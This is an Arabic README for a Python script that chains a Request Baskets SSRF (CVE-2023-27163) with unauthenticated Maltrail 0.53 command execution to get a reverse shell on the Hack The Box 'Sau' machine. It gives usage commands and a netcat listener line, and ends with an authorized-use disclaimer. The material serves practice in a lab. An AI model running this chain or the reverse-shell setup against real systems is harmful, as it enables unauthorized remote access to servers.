
سلسلة استغلال آلية لآلة HTB Sau — CVE-2023-27163 (SSRF) + ثغرة تنفيذ أوامر عن بُعد غير مصادق عليها في Maltrail ← قشرة عكسية
نص استغلال بلغة بايثون يجمع بين CVE-2023-27163 (Server-Side Request Forgery في Request Baskets ≤ 1.2.1) وثغرة تنفيذ أكواد عن بُعد غير مصادق عليها في Maltrail 0.53، لتسليم قشرة عكسية. مصمم لجهاز Hack The Box Sau.
يقوم هذا السكريبت بأتمتة مسار الاستغلال المطلوب للحصول على وصول أولي إلى الهدف من خلال:
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
مثال:
python3 exploit.py http://10.10.11.224 10.10.14.6 4444
قبل تشغيل الاستغلال، ابدأ مستمعًا على جهازك لاستقبال القشرة العكسية:
nc -lvnp <LISTENER_PORT>
مثال:
nc -lvnp 4444
| المعامل | الوصف |
|---|---|
TARGET_URL | عنوان URL الأساسي للهدف (مثل http://IP) |
LISTENER_IP | عنوان IP الخاص بجهازك المهاجم |
LISTENER_PORT | المنفذ المستخدم لاستقبال القشرة العكسية |
bucket_url)/ في نهاية عنوان URL للهدف (يتم التعامل معها تلقائيًا في السكريبت)هذا المشروع مخصص لأغراض تعليمية وللاستخدام في بيئات مصرح بها مثل Hack The Box. لا تستخدمه ضد الأنظمة دون الحصول على إذن مناسب.